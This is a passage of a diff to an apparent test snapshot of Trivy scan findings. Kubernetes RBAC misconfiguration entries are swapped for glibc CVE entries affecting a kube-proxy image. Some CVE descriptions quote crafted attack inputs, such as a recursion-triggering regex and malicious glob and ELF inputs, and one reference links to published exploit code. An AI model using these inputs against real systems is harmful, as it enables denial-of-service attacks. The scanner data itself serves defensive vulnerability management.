pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-27618", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "https://access.redhat.com/security/cve/CVE-2020-27618", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", + "https://linux.oracle.com/cve/CVE-2020-27618.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210401-0006/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "category": "Vulnerability", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/nvd/cve-2020-27618", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2020-27618", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(ClusterRole 'admin' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV050", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv050", - ], - }, - "category": "Misconfiguration", - "description": "An effective level of access equivalent to cluster-admin should not be provided.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", - "name": "Do not allow management of RBAC resources(ClusterRole 'admin' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv050", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security.gentoo.org/glsa/202107-07", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-4756", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "category": "Vulnerability", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "http://cxib.net/stuff/glob-0day.c", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "http://securityreason.com/exploitalert/9223", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-20796", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", ], }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(ClusterRole 'edit' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "category": "Vulnerability", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "http://www.securityfocus.com/bid/107160", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: stack guard protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV050", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv050", - ], - }, - "category": "Misconfiguration", - "description": "An effective level of access equivalent to cluster-admin should not be provided.", - "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", - "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", - "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv050", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV050", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv050", - ], - }, - "category": "Misconfiguration", - "description": "An effective level of access equivalent to cluster-admin should not be provided.", - "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", - "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", - "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv050", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV045", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv045", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits wildcard verb on specific resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", - "mitigation": "Create a role which does not permit wildcard verb on specific resources", - "name": "No wildcard verb roles(Role permits wildcard verb on specific resources)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv045", + "value": "https://ubuntu.com/security/CVE-2019-1010022", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", ], }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'local-path-provisioner-role' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "http://www.securityfocus.com/bid/109167", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV050", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - 